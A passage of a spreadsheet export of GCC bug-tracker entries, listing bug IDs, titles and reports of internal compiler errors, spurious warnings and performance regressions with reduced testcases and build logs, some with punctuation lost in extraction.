../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
84-&gt;88 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
82-&gt;83 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
82-&gt;84 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
81-&gt;82 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
81-&gt;84 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
76-&gt;77 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
76-&gt;78 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
71-&gt;72 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
71-&gt;73 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
70-&gt;71 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
70-&gt;73 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
68-&gt;69 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
68-&gt;70 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
67-&gt;68 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
67-&gt;70 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
43-&gt;44 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
43-&gt;45 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
42-&gt;43 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
42-&gt;45 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
38-&gt;39 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
38-&gt;103 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
37-&gt;38 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
37-&gt;103 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
30-&gt;31 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
30-&gt;32 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
25-&gt;26 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
25-&gt;27 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
22-&gt;23 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
22-&gt;103 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
11-&gt;12 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
11-&gt;13 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
9-&gt;10 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
9-&gt;11 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
8-&gt;9 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
8-&gt;10 -2147483648
../../gcc/cfgcleanup.c:1562: internal compiler error: verify_flow_info failed
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-30381</t>
  </si>
  <si>
    <t>[4.1 only] ISHFTC() constant folding is broken.</t>
  </si>
  <si>
    <t>According to example in the F95 standard this program should output 5 if given inputs of 2 and 3.  It does indeed do this.
  program shiftcirc
    integer i j
    read(**) i j
    write(**) ishftc( 3 i j )
  end program
However if we replace i and j with constants things start breaking.  First:
  program shiftcirc
    write(**) ishftc( 3 2 3 )
  end program
This outputs -3 which is incorrect.  Worse if we do this:
  program shiftcirc
    integer i
    read(**) i
    write(**) ishftc( 3 2 i )
  end program
This gives an error on compilation:
debian-gfortran:~/test&gt; ../bin-trunk/bin/gfortran ishftc.f90 -o ishftc
ishftc.f90:4.26:
  write(**) ishftc( 3 2 i )
                         1
Error: Invalid third argument of ISHFTC at (1)</t>
  </si>
  <si>
    <t>GCC-14795</t>
  </si>
  <si>
    <t>[4.0 Regression] gengtype-yacc.y:275.2-278.9: type clash (`o' `s') on default action</t>
  </si>
  <si>
    <t>I can't bootsrap current CVS mainline GCC with
bison (GNU Bison) 1.75 and flex version 2.5.4
Error message:
--8X---------------------------------
bison  -d -o gengtype-
yacc.c /home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-yacc.y
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-yacc.y:275.2-278.9: type 
clash (`o' `s') on default action
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-yacc.y:278.10: parse 
error unexpected : expecting  or |
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-yacc.y:305.1-2: parse 
error unexpected %% expecting  or |
gmake[2]: [gengtype-yacc.h] Error 1 (ignored)
gcc -c   -g -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-
prototypes -Wold-style-definition -fno-common -Wno-error  -DHAVE_CONFIG_H -
DGENERATOR_FILE    -I. -I. -I/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc -
I/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/. -
I/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/../include -I../intl \
 gengtype-lex.c -o gengtype-lex.o
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:31:27: gengtype-
yacc.h: No such file or directory
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l: In function 
`yylex':
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:203: error: 
`yylval' undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:203: error: (Each 
undeclared identifier is reported only once
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:203: error: for 
each function it appears in.)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:206: error: 
`ENT_TYPEDEF_STRUCT' undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:206: error: 
`ENT_STRUCT' undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:212: error: 
`ENT_EXTERNSTATIC' undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:218: error: 
`ENT_YACCUNION' undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:233: error: 
`GTY_TOKEN' undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:234: error: 
`UNION' undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:235: error: 
`STRUCT' undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:236: error: `ENUM' 
undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:237: error: 
`ALIAS' undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:238: error: `NUM' 
undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:241: error: 
`PARAM_IS' undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:253: error: 
`SCALAR' undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:258: error: `ID' 
undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:263: error: 
`STRING' undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:267: error: 
`ARRAY' undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:271: error: 
`PERCENT_ID' undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:275: error: `CHAR' 
undeclared (first use in this function)
/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/gengtype-lex.l:291: error: 
`PERCENTPERCENT' undeclared (first use in this function)
gengtype-lex.c: In function `yy_get_next_buffer':
gengtype-lex.c:2413: warning: old-style parameter declaration
gengtype-lex.c: In function `yy_get_previous_state':
gengtype-lex.c:2545: warning: old-style parameter declaration
gengtype-lex.c: In function `input':
gengtype-lex.c:2658: warning: old-style parameter declaration
gmake[2]: *** [gengtype-lex.o] Error 1
gmake[2]: Leaving directory `/usr/home/wanderer/pkg/build/gcc/obj/gcc'
gmake[1]: *** [stage1_build] Error 2
gmake[1]: Leaving directory `/usr/home/wanderer/pkg/build/gcc/obj/gcc'
gmake: *** [bootstrap] Error 2
--X8---------------------------------</t>
  </si>
  <si>
    <t>GCC-68767</t>
  </si>
  <si>
    <t>[6 regression] spurious warning: null argument where non-null required</t>
  </si>
  <si>
    <t>This test compiled with g++ -c -Werror -Wall:
// { dg-do compile }
// { dg-options -Werror -Wall }
extern int len (const char *__s)
     throw () __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)))
extern int num
int
f (void)
{
  int i
  i = len ((((num != 2) ? lstr : num == 1 ? str : 0) ? ((num != 2) ? lstr : num == 1 ? str : 0) : lstr ))
  return i
}
gets the spurious warning:
tmp.C:14:115: error: null argument where non-null required (argument 1) [-Werror=nonnull]
 m == 1 ? str : 0) ? ((num != 2) ? lstr : num == 1 ? str : 0) : lstr ))
                                                                              ^
Ironically this is condensed down from c-common.c complaining about itself when building gcc for a target with a variable BITS_PER_UNIT which also uses
newlib-stdint.h .
Originally observed with g++ (GCC) 5.1.1 20150618 (Red Hat 5.1.1-4) but also reproduced with g++ (GCC) 6.0.0 20151207 (experimental) .</t>
  </si>
  <si>
    <t>GCC-27668</t>
  </si>
  <si>
    <t>[4.1 regression] ICE with invalid template parameter</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 3.4.0:
==================================================
template struct A {}
template void foo(A)
==================================================
bug.cc:1: error: expected nested-name-specifier before 'class'
bug.cc:1: error: two or more data types in declaration of 'parameter'
bug.cc:1: error: 'struct T' is not a valid type for a template constant parameter
bug.cc:3: error: type/value mismatch at argument 1 in template parameter list for 'template void  &gt; struct A'
bug.cc:3: error:   expected a constant of type 'int' got 'int'
bug.cc:3: internal compiler error: in value_dependent_expression_p at cp/pt.c:12489
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-33415</t>
  </si>
  <si>
    <t>Can't compile .cpp file with UTF-8 BOM.</t>
  </si>
  <si>
    <t>As I need to port my project to vs2005 and the source code contain some UTF-8 string which is not suitable to represent by escaping I have to add UTF-8 BOM to make vs2005 recognize it. But after I added the UTF-8 BOM gcc can't compile it anymore even using -finput-charset=UTF-8 it still say error about \357 \273 \277.
Can you fix this problem?
escaping is troublesome as too many of them and make the source code unreadable.
vs2005 surely need UTF-8 BOM.
While gcc can't accept UTF-8 BOM presently.
Thank you!</t>
  </si>
  <si>
    <t>huzheng_001</t>
  </si>
  <si>
    <t>GCC-78614</t>
  </si>
  <si>
    <t>[7 Regression] ICE error: invalid rtl sharing found in the insn (verify_rtx_sharing) gcc/emit-rtl.c:2743</t>
  </si>
  <si>
    <t>$ cat tc.ii
int a b
void fn1(__float128 p1) { b = p1 - a }
$ /home/marxin/Programming/gcc/objdir/./gcc/xgcc -B/home/marxin/Programming/gcc/objdir/./gcc/   -mfloat128 tc.ii -O2
tc.ii: In function â€˜void fn1(__float128)â€™:
tc.ii:2:39: error: invalid rtl sharing found in the insn
 void fn1(__float128 p1) { b = p1 - a }
                                       ^
(insn/f 31 30 32 2 (parallel [
            (set (mem/c:V4SI (plus:DI (reg/f:DI 1 1)
                        (reg:DI 0 0)) [2  S16 A8])
                (reg:V4SI 108 31))
            (unspec [
                    (const_int 0 [0])
                ] UNSPEC_STVX)
        ]) tc.ii:2 -1
     (expr_list:REG_FRAME_RELATED_EXPR (parallel [
                (set/f (mem/c:V4SI (plus:DI (reg/f:DI 1 1)
                            (const_int 32 [0x20])) [2  S16 A8])
                    (reg:V4SI 108 31))
                (unspec [
                        (const_int 0 [0])
                    ] UNSPEC_STVX)
            ])
        (nil)))
tc.ii:2:39: error: shared rtx
(unspec [
        (const_int 0 [0])
    ] UNSPEC_STVX)
tc.ii:2:39: internal compiler error: internal consistency failure
0x10a7f267 verify_rtx_sharing
	../../gcc/emit-rtl.c:2743
0x10a7f473 verify_rtx_sharing
	../../gcc/emit-rtl.c:2776
0x10a7f323 verify_rtx_sharing
	../../gcc/emit-rtl.c:2758
0x10a7f877 verify_insn_sharing
	../../gcc/emit-rtl.c:2830
0x10a7f977 verify_rtl_sharing()
	../../gcc/emit-rtl.c:2852
0x10f56d6b execute_function_todo
	../../gcc/passes.c:1982
0x10f55423 do_per_function
	../../gcc/passes.c:1649
0x10f56f3f execute_todo
	../../gcc/passes.c:2015</t>
  </si>
  <si>
    <t>GCC-51347</t>
  </si>
  <si>
    <t>[trans-mem] Segfault on templates with -O1 -fgnu-tm</t>
  </si>
  <si>
    <t>Created attachment 25946
Testcase
I am doing some experiments with the transaction memory feature which has recently been merged to the main trunk. Currently one of my tests causes g++ segfault. 
---
main.cpp: In member function 'void BugContainer::bug() [with ValueType = Info]':
main.cpp:35:1: internal compiler error: Segmentation fault
---
It is always reproducible and tested on various configurations. 
I simplified code and made reduced testcase.
gcc from the trunk rev 181801 date 20111129. 
Debian gcc-snapshot 20111114 has some problems.
--
Configured with: ../configure --prefix=/usr/lib/gcc-snapshot --disable-bootstrap --enable-languages=cc++ --enable-shared --enable-linker-build-id --with-system-zlib --disable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --with-arch-directory=amd64 --with-arch-32=i586 --with-tune=generic --disable-werror --enable-checking=yes --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.7.0 20111129 (experimental) (GCC) 
--</t>
  </si>
  <si>
    <t>GCC-81956</t>
  </si>
  <si>
    <t>[7 regression] call to null procedure not optimized away</t>
  </si>
  <si>
    <t>Hello. Has the behavior of null procedures been changed from gcc-7?
package p is
   procedure Null_Proc is null
end p
with p
procedure main is
begin
   p.Null_Proc
end main
With gcc-7.2 the calling Null_Proc is generated into the object code.
$ gcc -c -O1 main.adb
$ nm main.o
0000000000000010 s EH_frame1
0000000000000000 S __ada_main
                 U _p__null_proc
With gcc-6.2 this calling Null_Proc has been skipped. I think this behavior is desirable.
$ gcc -c -O1 main.adb
$ nm main.o
0000000000000008 s EH_frame1
0000000000000000 S __ada_main</t>
  </si>
  <si>
    <t>demoonlit</t>
  </si>
  <si>
    <t>GCC-48995</t>
  </si>
  <si>
    <t>Function called twice during initialization of an allocated packed unconstrained array.</t>
  </si>
  <si>
    <t>Created attachment 24246
simple test case code
Please see the attached archive for a reproducer of this issue.
The expected output can be obtained by constraining the declaration of
Media.Image or by removing the pragma Pack (Image) from the
specification of the Media package.
It is understood that this problem has been resolved within AdaCores private codebase.
Discussion on 'comp.lang.ada' of the problem may be found at:
http://groups.google.com/group/comp.lang.ada/browse_thread/thread/75d2eb9e2e52a8c5#</t>
  </si>
  <si>
    <t>rodakay</t>
  </si>
  <si>
    <t>GCC-71275</t>
  </si>
  <si>
    <t>[7 regression] Performance drop after r235660 on x86-64 in 32-bit mode.</t>
  </si>
  <si>
    <t>Regression can be seen at attached test-case. In the tail block of innermost loop redundant fill was added:
    before r235660                r235660
.L3:
	addl	$1 %esi          addl    $1 %esi
	addl	%eax %ebx        addl    %eax %ebx
	movw	%bp (%edi%ecx)  movl    44(%esp) %edx
	movswl	%si %ebp         movswl  %si %eax
	cmpl	(%esp) %ebp      cmpl    %edi %eax
	jl	.L6               movw    %bp (%edx%ecx)
                                  jl      .L6
In result we got up to 14% slow-down on one important benchmark.
It is clear that it is not profitable to keep value of loop upper bound on register instead of the address base.</t>
  </si>
  <si>
    <t>GCC-7705</t>
  </si>
  <si>
    <t>Internal compiler error in simplify_subreg</t>
  </si>
  <si>
    <t>When building binutils-2.13 for target powerpc-linux an internal compiler error in simplify_subreg is reported.
The source file is gas/config/tc-ppc.c. Its preprocessed output is included in attachement.
It fails when compiled -O1 or -O2 but succeeds with -O0.
It also fails with gcc-3.1 but works with gcc-3.0.4.
Release:
gcc version 3.1.1
Environment:
Kernel 2.4.9 on i686 (RH 7.2)
glibc 2.2.5
How-To-Repeat:
Build binutils 2.13 for target powerpc-linux
or
From the file in attachement execute
  gzip -dc  tc-ppc.i
  gcc -O2 -c tc-ppc.i</t>
  </si>
  <si>
    <t>jdboyer</t>
  </si>
  <si>
    <t>GCC-9324</t>
  </si>
  <si>
    <t>[3.4 regression] segfault on combination of -O2/functionptr/return val/argument/inline</t>
  </si>
  <si>
    <t>gcc-3.4 segfaults on how-to-repeat-program.
compiler-3.4-failureb.c: In function `callfunc':
compiler-3.4-failureb.c:11: internal compiler error: Segmentation fault
Please submit a full bug report...
The bug occurs also if
- the function pointer is embedded in a structure
- values have some useful values. This scenario comes from linux-kernel 2.4.19-pre8
  kernel/signal.c where the function names are/were different.
It does not crash if
- the parameter of callfunc is removed though not used
- no inline is used
- callfunc does not return a value
This bug is new in gcc-3.4 maybe has something to do with PR9298 maybe not
Release:
gcc-3.4 cvs
Environment:
Reading specs from /usr/lib/gcc-lib/i686-pc-linux-gnu/3.4/specs
Configured with:  : (reconfigured)  : (reconfigured) 
Thread model: posix
gcc version 3.4 20030115 (experimental)
How-To-Repeat:
Compile the follwoing code with gcc -O2 -c:
typedef void (*func)()
inline func getfunc()
{
  return (func) 3
}
int callfunc(int foo) /* works without parameter */
{
  getfunc () ()
  return 0 /* works without return */
}</t>
  </si>
  <si>
    <t>GCC-66336</t>
  </si>
  <si>
    <t>[C++14][Variable templates] Spurious error: expansion pattern contains no argument packs</t>
  </si>
  <si>
    <t>Created attachment 35651
Minimal testcase
$ g++-trunk --version
g++-trunk (GCC) 5.1.0
Copyright (C) 2015 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ cat main.cpp            
template
int i {}
template
void f()
{
    // error: expansion pattern 'i' contains no argument packs
    int is[] = { i... }
}
int main()
{
    f()
}
$ g++-trunk -std=c++14 main.cpp
main.cpp: In function 'void f()':
main.cpp:8:23: error: expansion pattern 'i' contains no argument packs
     int is[] = { i... }</t>
  </si>
  <si>
    <t>GCC-12161</t>
  </si>
  <si>
    <t>ICE during bootstrap locale-inst.c cp/call.c: 4571</t>
  </si>
  <si>
    <t>gcc ICE's during bootstrap while compiling locale-inst.c.
This is a regression from gcc 3.3.1.
This happens with gcc HEAD 2003-09-03 17:51:23 UTC.
I pre-processed locale-inst.c into locale-inst.ii and renamed it to z6.ii.  I
will attach z6.ii so that you can reproduce the bug.
The full ICE is:
GGC heuristics: --param ggc-min-expand=38 --param ggc-min-heapsize=15575
z6.ii: In member function `std::money_base::pattern std::moneypunct&lt;_CharT
_Intl&gt;::neg_format() const [with _CharT = char bool _Intl =  true]':
z6.ii:26531:   instantiated from here
z6.ii:20295: internal compiler error: tree check: expected tree_list have
goto_stmt in build_over_call at cp/call.c:4571
The ICE is sensitive to the size of ggc-min-heapsize.  If I set ggc-min-heapsize
to 12000 the ICE goes away.  If I set ggc-min-heapsize to 16384 the ICE goes
away.  15575 happens to be the natural value of ggc-min-heapsize reported by
gcc -v on my machine (128 MB memory with some memory stolen for video).
Compile with:
/berman/fsf/_today_/berman/build/target/native/gcc/gcc-HEAD-binutils-2.14/gcc/xgcc
-v -B
/berman/fsf/_today_/berman/build/target/native/gcc/gcc-HEAD-binutils-2.14/gcc/
-O2 -g -fno-implicit-templates -S --param ggc-min-expand=38 --param
ggc-min-heapsize=15575 z6.ii
I did some date-searching and came up with these dates:
2003-08-29 18:00:00 UTC  works fine
2003-08-29 23:00:00 UTC  ICE segment violation
2003-08-29 23:30:00 UTC  ICE cp/call.c: 4571
The 23:00 ICE is a different ICE that happens earlier and is not sensitive to
heap size.  It looks like a bug that has already been fixed.
The 23:30 ICE is sensitive to heap size.  This version of gcc works fine with
ggc-min-heapsize equal to 65536 32768 16384 or 12000.  It ICEs out with
ggc-min-heapsize equal to 15575.</t>
  </si>
  <si>
    <t>mec</t>
  </si>
  <si>
    <t>GCC-23515</t>
  </si>
  <si>
    <t>ICE on correct code</t>
  </si>
  <si>
    <t>[prt@localhost mytests]# cat foo.f90 program foo
  common /x/ a
  a = 1
  call bar ()
contains
  subroutine bar ()
    equivalence (ab)
    print * b
  end subroutine bar
end program foo
[prt@localhost mytests]# /gcc-4.0/bin/gfortran foo.f90
foo.f90: In function â€˜MAIN__â€™:
foo.f90:8: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[prt@localhost mytests]# cat foo*al
{
  union
  {
    real4 a
  } equiv.0
  real4 b
  _gfortran_filename = foo.f90
  _gfortran_line = 8
  _gfortran_ioparm.unit = 6
  _gfortran_ioparm.list_format = 1
  _gfortran_st_write ()
  _gfortran_transfer_real (
  _gfortran_st_write_done ()
}
Note no MAIN. My mainline gets further but the equivalences are similarly
stuffed.  Declaring a and b before the equivalence gives correct code.  I would
surmise therefore that match_equivalence needs to check that symbols exist for
each member of the equivalence group and that they are from the current scoping
unit.  If they are not local symbols must be created.
Paul T</t>
  </si>
  <si>
    <t>GCC-64118</t>
  </si>
  <si>
    <t>Strange warning about unused function/subroutine</t>
  </si>
  <si>
    <t>Created attachment 34144
Tar archive with source code
With the attached tests I get the following warning:
$ gfortran -Wall test_unused_func.f90 -o test_unused_func.out
test_unused_func.f90:54:0: warning: â€˜fâ€™ defined but not used [-Wunused-function]
   real(dp) function f(x) result(y)
 ^
$ gfortran -Wall test_unused_sub.f90 -o test_unused_sub.out
test_unused_sub.f90:44:0: warning: â€˜sub3â€™ defined but not used [-Wunused-function]
   subroutine sub3()
 ^
test_unused_sub.f90:40:0: warning: â€˜sub2â€™ defined but not used [-Wunused-function]
   subroutine sub2()
 ^
test_unused_sub.f90:36:0: warning: â€˜sub1â€™ defined but not used [-Wunused-function]
   subroutine sub1()
 ^
which I find a bit strange: after all the function f() in the first test for example is used because it is passed to the call of simpson().. and indeed
$ ./test_unused_func.out
   1.4250604553524227
   1.9202581413298656
confirming it is _used_!
I found this using gfortran from GCC: 4.8.2 (MSYS2 64) 4.8.3 (OSX+MacPorts 64 Cygwin64) 4.9.1 (MSYS2+MinGW64) but maybe also recent versions of gfortran are affected.
The tests are archived in the attached tar-ball.
See also the discussion on gfortran mailing list:
https://gcc.gnu.org/ml/fortran/2014-07/msg00168.html
https://gcc.gnu.org/ml/fortran/2014-11/msg00143.html
Ciao
 Angelo.</t>
  </si>
  <si>
    <t>angelo.graziosi</t>
  </si>
  <si>
    <t>GCC-42108</t>
  </si>
  <si>
    <t>[4.9 Regression] 50% performance regression</t>
  </si>
  <si>
    <t>With the attached sample code I get a substantial performance drop from 4.3.1 to either 4.4.1 or 4.5.0 same compiler option same machine. To reproduce feed a size to the program (in the case below 40000) and time the executable. 
[sfilippo@donald fgp_fmm_20091112]$ gfortran -v  
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.3.1/configure --prefix=/usr/local/gcc43 --with-mpfr=/u
sr/local/mpfr --with-gmp=/usr/local/gmp
Thread model: posix
gcc version 4.3.1 (GCC) 
[sfilippo@donald fgp_fmm_20091112]$ gfortran -O3 -o try_eval eval.f90
[sfilippo@donald fgp_fmm_20091112]$ time ./try_eval &lt;&lt;EOF
40000
EOF
real    0m10.871s
user    0m10.825s
sys     0m0.011s
[sfilippo@donald fgp_fmm_20091112]$ module unload gnu43
[sfilippo@donald fgp_fmm_20091112]$ module load gnu45 
        gnu45 - loads the GNU 4.5.0-pre compilers suite
        Version 1.0
[sfilippo@donald fgp_fmm_20091112]$ gfortran -v 
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/usr/local/gnu45/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/
lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc/configure --prefix=/usr/local/gnu45 --enable-languages=c
c++fortran : (reconfigured) ../gcc/configure --prefix=/usr/local/gnu45 --enabl
e-languages=cc++fortran : (reconfigured) ../gcc/configure --prefix=/usr/local/
gnu45 --enable-languages=cc++fortranlto --no-create --no-recursion : (reconfi
gured) ../gcc/configure --prefix=/usr/local/gnu45 --enable-languages=cc++fortr
anlto --no-create --no-recursion
Thread model: posix
gcc version 4.5.0 20091119 (experimental) (GCC) 
[sfilippo@donald fgp_fmm_20091112]$ gfortran -O3 -o try_eval eval.f90
[sfilippo@donald fgp_fmm_20091112]$ time ./try_eval &lt;&lt;EOF
40000
EOF
real    0m23.935s
user    0m23.862s
sys     0m0.011s
[sfilippo@donald fgp_fmm_20091112]$ cat /proc/cpuinfo
processor       : 0
vendor_id       : AuthenticAMD
cpu family      : 16
model           : 2
model name      : AMD Athlon(tm) 7750 Dual-Core Processor
stepping        : 3
cpu MHz         : 2700.000
cache size      : 512 KB
physical id     : 0
siblings        : 2
core id         : 0
cpu cores       : 2
apicid          : 0
initial apicid  : 0
fpu             : yes
fpu_exception   : yes
cpuid level     : 5
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm 3dnowext 3dnow constant_tsc rep_good nonstop_tsc extd_apicid pni monitor cx16 lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs
bogomips        : 5424.74
TLB size        : 1024 4K pages
clflush size    : 64
cache_alignment : 64
address sizes   : 48 bits physical 48 bits virtual
power management: ts ttp tm stc 100mhzsteps hwpstate</t>
  </si>
  <si>
    <t>GCC-2236</t>
  </si>
  <si>
    <t>config.if (gcc 2.95.2 possibly others) pukes if it can't find gl*bc</t>
  </si>
  <si>
    <t>If you have the misfortune of being on a Linux box 
config.if does various checks to see what version of
gl*bc is on that box and if it can't find out which
version it fails with an exit 1.    Mastodon Linux
uses libc 4.8.0 which does not do the magic config.if
expects -- config.if should return a `this is an unknown
library' token instead of dying.
Release:
gcc 2.95.2
Environment:
Mastodon Linux INST0064-dr2 (libc 4.8.0) on ia32
How-To-Repeat:
Run configure on a Mastodon INST0050-&gt;INST0064 system.</t>
  </si>
  <si>
    <t>orc</t>
  </si>
  <si>
    <t>GCC-5355</t>
  </si>
  <si>
    <t>pointer to templated function gives internal error</t>
  </si>
  <si>
    <t>An attempt to create a pointer to a templated member function causes an internal compiler error. See attached minimum code example.
Release:
MINGW 2.95.2-1
Environment:
Windows 98
How-To-Repeat:
class TryIt
{
  public:
    template T *create()
    {
      Deletor=destroy
      return new T
    }
    template void destroy(void *&amp;Ptr)
    {
      Deletor(reinterpret_cast(Ptr))
    }
  private:
    void (*Deletor)(void *
}
void main()
{
  TryIt Try
  int *Ptr = Try.create()
}</t>
  </si>
  <si>
    <t>bmeijer</t>
  </si>
  <si>
    <t>GCC-64930</t>
  </si>
  <si>
    <t>[5 regression] FAIL: gcc.target/powerpc/atomic-p7.c scan-assembler-times isync 12</t>
  </si>
  <si>
    <t>$ gcc/xgcc -Bgcc/ ../gcc/testsuite/gcc.target/powerpc/atomic-p7.c -mcpu=power7 -O2 -S -m64 -o atomic-p7.s
$ grep -c isync atomic-p7.s
16
$ gcc/xgcc -Bgcc/ ../gcc/testsuite/gcc.target/powerpc/atomic-p8.c -mcpu=power8 -O2 -S -m64 -o atomic-p8.s
$ grep -c isync atomic-p8.s
25</t>
  </si>
  <si>
    <t>GCC-5766</t>
  </si>
  <si>
    <t>Bug#85908: Info received and FILED only</t>
  </si>
  <si>
    <t xml:space="preserve"> Thank you for the additional information you have supplied regarding
 this problem report.  It has NOT been forwarded to the developers but
 will accompany the original report in the Bug tracking system.  Please
 ensure that you yourself have sent a copy of the additional
 information to any relevant developers or mailing lists.
 If you wish to continue to submit further information on your problem
 please send it to 85908-quiet@bugs.debian.org as before.
 Please do not reply to the address at the top of this message
 unless you wish to report a problem with the Bug-tracking system.
 Debian bug tracking system administrator
 (administrator Debian Bugs database)
Release:
unknown
Unformatted:
          (was c/3487: unrecognized token before #include points to wrong source)</t>
  </si>
  <si>
    <t>GCC-55281</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE in  build_int_cst_wide at tree.c:1217  (with Ofast ok with O3)</t>
  </si>
  <si>
    <t>Created attachment 28666
preprocesse real-file code
c++ -std=gnu++11  -Ofast -c PhiPattern.ii
plugins/PhiPattern.cc: In member function 'virtual int PhiPattern::produce(WhiteBoard&amp;)':
plugins/PhiPattern.cc:26:5: internal compiler error: in build_int_cst_wide at tree.c:1217
